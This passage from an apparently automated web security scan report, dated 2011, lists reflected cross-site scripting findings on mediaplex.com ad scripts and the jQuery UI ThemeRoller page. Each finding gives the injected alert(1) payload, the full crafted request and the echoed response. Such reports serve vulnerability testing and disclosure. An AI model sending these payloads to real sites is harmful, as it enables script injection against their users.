GET /content/0/16228/131652/Lumension_IWL_300x250_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-1%3Fmpt%3D78201111221b918'%3balert(1)//60364513c23&mpt=7820111122&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=16228:26209/1551:9866/16161:27909/15017:34236/5712:3840/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:50:36 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 19:28:27 GMT
ETag: "594d3d-f89-4a67a34afccc0"
Accept-Ranges: bytes
Content-Length: 4317
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://altfarm.mediaplex.com/ad/ck/16228-131652-26209-1?mpt=78201111221b918';alert(1)//60364513c23" target="_blank">
...[SNIP]...

3.38. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_300x250_A01.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/131652/Lumension_IWL_300x250_A01.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba7d1"-alert(1)-"f80be01d7ee was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/131652/Lumension_IWL_300x250_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-1%3Fmpt%3D7820111122ba7d1"-alert(1)-"f80be01d7ee&mpt=7820111122&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=16228:26209/1551:9866/16161:27909/15017:34236/5712:3840/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:50:29 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 19:28:27 GMT
ETag: "594d3d-f89-4a67a34afccc0"
Accept-Ranges: bytes
Content-Length: 4311
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-1%3Fmpt%3D7820111122ba7d1"-alert(1)-"f80be01d7ee");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-1%3Fmpt%3D7820111122ba7d1"-alert(1)-"f80be01d7ee");
mpck =
...[SNIP]...

3.39. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_300x250_A01.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/131652/Lumension_IWL_300x250_A01.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27b45"%3balert(1)//46612244006 was submitted in the mpvc parameter. This input was echoed as 27b45";alert(1)//46612244006 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/131652/Lumension_IWL_300x250_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-1%3Fmpt%3D7820111122&mpt=7820111122&mpvc=27b45"%3balert(1)//46612244006 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=16228:26209/1551:9866/16161:27909/15017:34236/5712:3840/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:50:42 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 19:28:27 GMT
ETag: "594d3d-f89-4a67a34afccc0"
Accept-Ranges: bytes
Content-Length: 4313
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("27b45";alert(1)//46612244006");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("27b45";alert(1)//46612244006");
mpvc = encodeURIComponent(mpvclick2);
}
else
{
mpvc = ("27b45"%3balert(1)//46612244006");
...[SNIP]...

3.40. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_300x250_A01.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/131652/Lumension_IWL_300x250_A01.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0cdf'%3balert(1)//bc66d7f5ce2 was submitted in the mpvc parameter. This input was echoed as f0cdf';alert(1)//bc66d7f5ce2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/131652/Lumension_IWL_300x250_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-1%3Fmpt%3D7820111122&mpt=7820111122&mpvc=f0cdf'%3balert(1)//bc66d7f5ce2 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=16228:26209/1551:9866/16161:27909/15017:34236/5712:3840/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:50:57 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 19:28:27 GMT
ETag: "594d3d-f89-4a67a34afccc0"
Accept-Ranges: bytes
Content-Length: 4313
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="f0cdf';alert(1)//bc66d7f5ce2http://altfarm.mediaplex.com/ad/ck/16228-131652-26209-1?mpt=7820111122" target="_blank">
...[SNIP]...

3.41. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/131652/Lumension_IWL_728x90_A01.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fbc6'%3balert(1)//86a610e272d was submitted in the mpck parameter. This input was echoed as 5fbc6';alert(1)//86a610e272d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/131652/Lumension_IWL_728x90_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D78201111125fbc6'%3balert(1)//86a610e272d&mpt=7820111112&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=16228:26209/1551:9866/16161:27909/15017:34236/5712:3840/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:57:02 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 19:28:52 GMT
ETag: "594d41-f7f-4a67a362d4500"
Accept-Ranges: bytes
Content-Length: 4307
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://altfarm.mediaplex.com/ad/ck/16228-131652-26209-0?mpt=78201111125fbc6';alert(1)//86a610e272d" target="_blank">
...[SNIP]...

3.42. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/131652/Lumension_IWL_728x90_A01.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58cc3"-alert(1)-"dde3f81bfbe was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/131652/Lumension_IWL_728x90_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D782011111258cc3"-alert(1)-"dde3f81bfbe&mpt=7820111112&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=16228:26209/1551:9866/16161:27909/15017:34236/5712:3840/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:56:58 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 19:28:52 GMT
ETag: "594d41-f7f-4a67a362d4500"
Accept-Ranges: bytes
Content-Length: 4301
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D782011111258cc3"-alert(1)-"dde3f81bfbe");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D782011111258cc3"-alert(1)-"dde3f81bfbe");
mpck =
...[SNIP]...

3.43. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/131652/Lumension_IWL_728x90_A01.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e48d"%3balert(1)//72ddadbc4e8 was submitted in the mpvc parameter. This input was echoed as 1e48d";alert(1)//72ddadbc4e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/131652/Lumension_IWL_728x90_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D7820111112&mpt=7820111112&mpvc=1e48d"%3balert(1)//72ddadbc4e8 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=16228:26209/1551:9866/16161:27909/15017:34236/5712:3840/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:57:10 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 19:28:52 GMT
ETag: "594d41-f7f-4a67a362d4500"
Accept-Ranges: bytes
Content-Length: 4303
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("1e48d";alert(1)//72ddadbc4e8");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("1e48d";alert(1)//72ddadbc4e8");
mpvc = encodeURIComponent(mpvclick2);
}
else
{
mpvc = ("1e48d"%3balert(1)//72ddadbc4e8");
...[SNIP]...

3.44. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/131652/Lumension_IWL_728x90_A01.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84fd0'%3balert(1)//f2d6030a414 was submitted in the mpvc parameter. This input was echoed as 84fd0';alert(1)//f2d6030a414 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/131652/Lumension_IWL_728x90_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D7820111112&mpt=7820111112&mpvc=84fd0'%3balert(1)//f2d6030a414 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=16228:26209/1551:9866/16161:27909/15017:34236/5712:3840/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:57:16 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 19:28:52 GMT
ETag: "594d41-f7f-4a67a362d4500"
Accept-Ranges: bytes
Content-Length: 4303
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="84fd0';alert(1)//f2d6030a414http://altfarm.mediaplex.com/ad/ck/16228-131652-26209-0?mpt=7820111112" target="_blank">
...[SNIP]...

3.45. http://jqueryui.com/themeroller/ [bgColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2240d"><script>alert(1)</script>2089f77dadf was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lt=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&bord
...[SNIP]...

3.46. http://jqueryui.com/themeroller/ [bgColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a715"><script>alert(1)</script>09e95dd3a22 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff3a715"><script>alert(1)</script>09e95dd3a22&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
l&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff3a715"><script>alert(1)</script>09e95dd3a22&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&border
...[SNIP]...

3.47. http://jqueryui.com/themeroller/ [bgColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4055f"><script>alert(1)</script>0399770b2a2 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e64055f"><script>alert(1)</script>0399770b2a2&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
